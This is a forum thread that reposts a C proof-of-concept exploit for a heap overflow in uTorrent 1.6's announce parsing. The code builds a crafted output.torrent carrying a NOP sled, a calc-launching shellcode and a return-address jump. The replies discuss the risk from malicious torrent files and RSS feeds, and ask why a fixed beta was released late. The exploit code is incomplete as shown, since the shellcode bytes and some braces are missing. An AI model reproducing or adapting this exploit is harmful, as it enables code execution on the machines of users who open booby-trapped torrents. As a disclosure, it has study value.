Jump to content

Utorrent 1.6 Remote Announce Heap Overflow Exploit POC


Recommended Posts

* This is a PoC remote exploit for uTorrent 1.6
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
* Works on XP SP1 and w2k sp1-4

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\

int main(int argc,char *argv[])
FILE * pFile;
long lSize;
char * buffer;
size_t result;

long i = 0;
long j = 0;
long lPtrIndex;
long lHeadSize;
long lTailSize;
char * curptr;
char * alptr;
char * torrentTail;

if (argc < 2)
printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
printf("\n\nUsage: ");
printf(" <TorrentFile>\n");
return 0;

pFile = fopen (argv[1],"rb");
if (pFile==NULL)
fputs ("File error",stderr);
return 0;

// obtain file size:
fseek (pFile ,0,SEEK_END);
lSize = ftell (pFile);
rewind (pFile);

// allocate memory to contain the whole file:
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL)
fputs ("Memory error",stderr);
return 0;

// copy the file into the buffer:
result = fread (buffer,1,lSize,pFile);
if (result != lSize)
fputs ("Reading error",stderr);
return 0;

fclose (pFile);

/* find announce / announce-list and erase it */
alptr = (char *) strstr(buffer,"announce");
if (alptr == NULL)
printf("\ninvalid torrent file");
return 0;

curptr = (char *) strstr(alptr, "7:comment");
lHeadSize = curptr - buffer;
lTailSize = lSize - lHeadSize;

torrentTail = (char *) malloc (sizeof(char)*lTailSize);

/* generate offending header */
for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
nice_announce[lPtrIndex] = 0x90;
lPtrIndex = 84;
memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
lPtrIndex += sizeof(xorops) -1;
memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
nice_announce[lPtrIndex] = jmptosc[i];

/* get head and tail together into a file */
curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
for (i=0;i<NASIZE;i++)
curptr[i] = nice_announce[i];
for (;i<(NASIZE+lTailSize);i++,j++)
curptr[i] = torrentTail[j];

/* write to file and exit */
pFile = fopen ( "output.torrent" , "wb" );
if (pFile==NULL)
fputs ("File error",stderr);
return 0;
fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
fclose (pFile);

return 1337; //:)

Just a heads up.

Link to comment
Share on other sites

Yah, previously reported on the IRC channel ;\

Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files).

Link to comment
Share on other sites

It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?

edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!

Link to comment
Share on other sites

I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\

Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*

Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =)

Link to comment
Share on other sites

What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?

Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...